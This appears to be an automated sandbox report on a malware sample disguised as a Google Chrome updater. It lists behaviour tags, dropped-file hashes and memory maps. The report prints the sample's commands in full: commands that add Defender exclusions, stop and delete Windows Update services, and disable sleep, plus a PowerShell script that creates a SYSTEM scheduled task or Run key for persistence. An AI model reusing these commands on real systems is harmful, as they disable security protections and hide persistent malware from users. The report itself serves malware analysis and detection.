- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#qauvexd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe dyaqxbmsoinnnm2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe ugxlnakznvqhxgmt GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mD4z/F1I8voeixdh9ABkSX5OmiklgByXQ8r/0t6T+lh2⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.9MB
MD54219fd31abeed331b5459aded2b24a39
SHA1acbd8bcdff673b3dceffa7ae26c462ee5e030a70
SHA25618f3a9fc3b3fe7123e424941cae2c9d731f189db686c46e7a484579c69aef62d
SHA512e08340590aa827875b4b479018a1170d176df4b52e08ceebb55337707990993fe954cfa1b79d91ca84e6628ade8c19a874d94a51274a68d60254a63297a71173
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.9MB
MD54219fd31abeed331b5459aded2b24a39
SHA1acbd8bcdff673b3dceffa7ae26c462ee5e030a70
SHA25618f3a9fc3b3fe7123e424941cae2c9d731f189db686c46e7a484579c69aef62d
SHA512e08340590aa827875b4b479018a1170d176df4b52e08ceebb55337707990993fe954cfa1b79d91ca84e6628ade8c19a874d94a51274a68d60254a63297a71173
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5531f08ac3a06c5a3a09412a10fd95626
SHA1ad756b5c27e710d81ece8a6d4fe865230cdc2bbf
SHA256793902b936877a86b5d46d629a1c6d8c68ac8d42981788ddd4ede0f3381af6b0
SHA512ac8c608fae29fa780400ac84e79b86c4a34ee7068f4f2c8056e4a2209a3ba62ae7716eaea2924e8412eab38ad003d59d4538d675019e50f15b3571e14c52fa73
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a084085c1e171dbcbc9b3ca36ca51413
SHA132c74da1846ed93dc1ed808e3f9d8b6ea9c6ef82
SHA2565c63127c8c26c21cb39edbafcaa7c4cc18be20fa8bcc7e46968e67b80a94bc64
SHA5123e51800a8069e14afcd30486a1291b87255d87dd0cd2d4b583f02b440886dbddb7f590ae06a12503df079eccad4ef353bb13920ec0b3ded5ee936d43900bd455
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hostsMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/312-214-0x00007FF833AC0000-0x00007FF834581000-memory.dmpFilesize
10.8MB
-
memory/312-215-0x00000128A6859000-0x00000128A685F000-memory.dmpFilesize
24KB
-
memory/312-197-0x0000000000000000-mapping.dmp
-
memory/312-213-0x00007FF833AC0000-0x00007FF834581000-memory.dmpFilesize
10.8MB
-
memory/344-161-0x0000000000000000-mapping.dmp
-
memory/1032-193-0x0000000000000000-mapping.dmp
-
memory/1220-226-0x00007FF645C80000-0x00007FF646474000-memory.dmpFilesize
8.0MB
-
memory/1220-221-0x0000027C8BBA0000-0x0000027C8BBC0000-memory.dmpFilesize
128KB
-
memory/1220-220-0x00007FF6464725D0-mapping.dmp
-
memory/1220-227-0x00007FF645C80000-0x00007FF646474000-memory.dmpFilesize
8.0MB
-
memory/1248-144-0x0000000000000000-mapping.dmp
-
memory/1412-210-0x0000000000000000-mapping.dmp
-
memory/1440-158-0x0000000000000000-mapping.dmp
-
memory/1452-219-0x0000000000000000-mapping.dmp
-
memory/1552-204-0x0000000000000000-mapping.dmp
-
memory/1700-212-0x0000000000000000-mapping.dmp
-
memory/1864-180-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-223-0x00007FF851C70000-0x00007FF851E65000-memory.dmpFilesize
2.0MB
-
memory/1864-174-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-181-0x00007FF851C70000-0x00007FF851E65000-memory.dmpFilesize
2.0MB
-
memory/1864-222-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-175-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-176-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-173-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-179-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-177-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmpFilesize
14.8MB
-
memory/1864-178-0x00007FF851C70000-0x00007FF851E65000-memory.dmpFilesize
2.0MB
-
memory/1940-211-0x0000000000000000-mapping.dmp
-
memory/2036-152-0x0000000000000000-mapping.dmp
-
memory/2148-201-0x0000000000000000-mapping.dmp
-
memory/2224-154-0x0000000000000000-mapping.dmp
-
memory/2484-162-0x0000000000000000-mapping.dmp
-
memory/2636-167-0x00007FF851C70000-0x00007FF851E65000-memory.dmpFilesize
2.0MB
-
memory/2636-137-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2636-138-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2636-139-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2636-140-0x00007FF851C70000-0x00007FF851E65000-memory.dmpFilesize
2.0MB
-
memory/2636-166-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2636-132-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2636-136-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2636-134-0x00007FF851C70000-0x00007FF851E65000-memory.dmpFilesize
2.0MB
-
memory/2636-133-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2636-135-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmpFilesize
14.8MB
-
memory/2644-184-0x00000252F8C30000-0x00000252F8C4C000-memory.dmpFilesize
112KB
-
memory/2644-185-0x00000252F8A20000-0x00000252F8A2A000-memory.dmpFilesize
40KB
-
memory/2644-186-0x00000252F8E70000-0x00000252F8E8C000-memory.dmpFilesize
112KB
-
memory/2644-187-0x00000252F8E50000-0x00000252F8E5A000-memory.dmpFilesize
40KB
-
memory/2644-188-0x00000252F8EB0000-0x00000252F8ECA000-memory.dmpFilesize
104KB
-
memory/2644-189-0x00000252F8E60000-0x00000252F8E68000-memory.dmpFilesize
32KB
-
memory/2644-190-0x00000252F8E90000-0x00000252F8E96000-memory.dmpFilesize
24KB
-
memory/2644-191-0x00000252F8EA0000-0x00000252F8EAA000-memory.dmpFilesize
40KB
-
memory/2644-192-0x00007FF833AC0000-0x00007FF834581000-memory.dmpFilesize
10.8MB
-
memory/2644-183-0x00007FF833AC0000-0x00007FF834581000-memory.dmpFilesize
10.8MB
-
memory/2644-182-0x0000000000000000-mapping.dmp
-
memory/2660-160-0x0000000000000000-mapping.dmp
-
memory/2856-206-0x0000000000000000-mapping.dmp
-
memory/3100-216-0x00007FF7D2B714E0-mapping.dmp
-
memory/3136-209-0x0000000000000000-mapping.dmp
-
memory/3312-208-0x0000000000000000-mapping.dmp
-
memory/3556-157-0x0000000000000000-mapping.dmp
-
memory/3668-200-0x0000000000000000-mapping.dmp
-
memory/3872-198-0x0000000000000000-mapping.dmp
-
memory/3908-155-0x0000000000000000-mapping.dmp
-
memory/3916-156-0x0000000000000000-mapping.dmp
-
memory/4088-203-0x0000000000000000-mapping.dmp
-
memory/4140-205-0x0000000000000000-mapping.dmp
-
memory/4212-194-0x0000000000000000-mapping.dmp
-
memory/4308-153-0x0000000000000000-mapping.dmp
-
memory/4356-207-0x0000000000000000-mapping.dmp
-
memory/4368-217-0x0000000000000000-mapping.dmp
-
memory/4512-149-0x0000000000000000-mapping.dmp
-
memory/4532-172-0x00007FF833AC0000-0x00007FF834581000-memory.dmpFilesize
10.8MB
-
memory/4532-165-0x0000000000000000-mapping.dmp
-
memory/4532-169-0x00007FF833AC0000-0x00007FF834581000-memory.dmpFilesize
10.8MB
-
memory/4648-196-0x0000000000000000-mapping.dmp
-
memory/4936-147-0x0000000000000000-mapping.dmp
-
memory/4976-143-0x00007FF833790000-0x00007FF834251000-memory.dmpFilesize
10.8MB
-
memory/4976-142-0x00000283A82F0000-0x00000283A8312000-memory.dmpFilesize
136KB
-
memory/4976-141-0x0000000000000000-mapping.dmp
-
memory/5012-218-0x0000000000000000-mapping.dmp
-
memory/5016-145-0x0000000000000000-mapping.dmp
-
memory/5020-151-0x0000000000000000-mapping.dmp
-
memory/5036-164-0x00007FF833790000-0x00007FF834251000-memory.dmpFilesize
10.8MB
-
memory/5036-163-0x00007FF833790000-0x00007FF834251000-memory.dmpFilesize
10.8MB
-
memory/5036-146-0x0000000000000000-mapping.dmp
-
memory/5080-170-0x0000000000000000-mapping.dmp
-
memory/5084-159-0x0000000000000000-mapping.dmp